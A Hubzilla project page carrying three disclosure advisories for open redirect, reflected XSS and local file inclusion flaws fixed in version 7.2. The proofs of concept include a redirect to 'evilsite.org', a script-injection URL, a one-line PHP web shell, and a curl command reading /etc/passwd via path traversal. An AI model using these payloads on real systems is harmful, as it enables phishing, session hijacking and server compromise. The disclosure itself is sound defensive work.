Hubzilla Info

Hubzilla Info

info@hubzilla.org

The privacy respecting open source platform for webpublishing and social networking

CVE-2022-27256: Open Redirect in Hubzilla settings modules

2025-12-22 10:31:14

Harald Eilertsen

harald@hub.volse.no

An open redirect vulnerability in Hubzilla 7.0.3 and earlier allows remote attackers to redirect a logged in user to an arbitrary URL via the rpath parameter.

CVE: CVE-2022-27256
Severity: 4.7 (Medium)
CVSSv3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
Vulnerable application: Hubzilla
Component: Settings modules
Vulnerable version: Any version before 7.2
Fixed in: version 7.2

When submitting a change in one of the affected settings modules, the rpath query parameter is is passed on as a POST parameter and used blindly to redirect after submitting the form, leading to an open redirect vulnerability.

An attacker can use this to trick a victim to give them sensitive information by first directing them to change a setting and then redirect to an attacker controlled site after the victim submits the changes. For example by making malicious site look like the Hubzilla login form and convincing the victim they need to authenticate to save the changes.

Proof of concept

https://example.com/settings/calendar/?f=&rpath=https://evilsite.org/auth.php

Remediation

Upgrade to Hubzilla version 7.2 or later, where this vulnerability is fixed.

Credits

This issue was originally reported and fixed by Harald Eilertsen.

security

CVE-2022-27258: Reflected Cross-Site Scripting in Hubzilla settings modules

2025-12-21 16:51:47

Harald Eilertsen

harald@hub.volse.no

Multiple Cross-Site Scripting (XSS) vulnerabilities in Hubzilla 7.0.3 and earlier allows remote attacker to include arbitrary web script or HTML via the rpath parameter.

CVE: CVE-2022-27258
Severity: 7.4 (High)
CVSSv3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Vulnerable application: Hubzilla
Component: Settings modules
Vulnerable versions: Any version before 7.2
Fixed in: version 7.2

A number of settings modules does not sanitise or escape the rpath query parameter before outputting it into an html attribute, leading to a reflected Cross-Site Scripting (XSS) vulnerability.

An attacker could use this to inject arbitrary JavaScript into a victims' session by enticing them to click a link.

Proof of concept

https://example.com/settings/calendar/?f=&rpath=https://example.com/cdav/calendar'><script>alert('boom')</script>

Remediation

It is recommended to upgrade to version 7.2 or later, where this issue is fixed.

Credits

This issue was [url=https://volse.net/~haraldei/infosec/disclosures/hubzilla-before-7-2-multiple-vulnerabilities/)originally reported[/url] and fixed by Harald Eilertsen.

#security #cve #hubzilla #xss

security

CVE-2022-27257: Local file inclusion/Directory traversal in Redbasic theme for Hubzilla

2025-12-21 16:23:27

Harald Eilertsen

harald@hub.volse.no

A PHP Local File inclusion vulnerability in the Redbasic theme for Hubzilla before version 7.2 allows remote attackers to include arbitrary php files via the schema parameter.

CVE: CVE-2022-27256
Severity: 8.3 (High)
CVSSv3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
Vulnerable application: Hubzilla
Component: Redbasic (default/builtin theme)
Vulnerable versions: Any version before 7.2
Fixed in: version 7.2

The RedBasic theme in Hubzilla versions before version 7.2 does not validate the $_REQUEST['schema'] argument before using it in a require_once call, leading to a Local File Inclusion (LFI) vulnerability. Further it does not check the filename for directory separators or other special chars, leading to a directory traversal vulnerability.

This allows an attacker to directly run PHP code from any known location in the file system where the web server process has read access. This includes files in the Hubzilla source three that would otherwise be protected by the default server configuration that redirects all requests to pass through the Hubzilla routing logic.

Proof of concept

Given a file shell.php somewhere in the server file system:

<?php system($_REQUEST['cmd']); ?>

Any command can be executed by a remote, unauthenticated attacker, like this:

$ curl -s 'https://example.com/view/theme/redbasic/php/style.pcss?f=&puid=2&schema=../../../../shell&v=7.1.6&cmd=cat%20/etc/passwd'|head
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

Mitigating factors

As Hubzilla will rename uploaded files to a GUID, it's not trivially possible to upload a malicious file to be exploited by this weakness by itself. It requires another way to upload the malicious file, or by finding an existing file that is exploitable within or outside of the Hubzilla directory tree.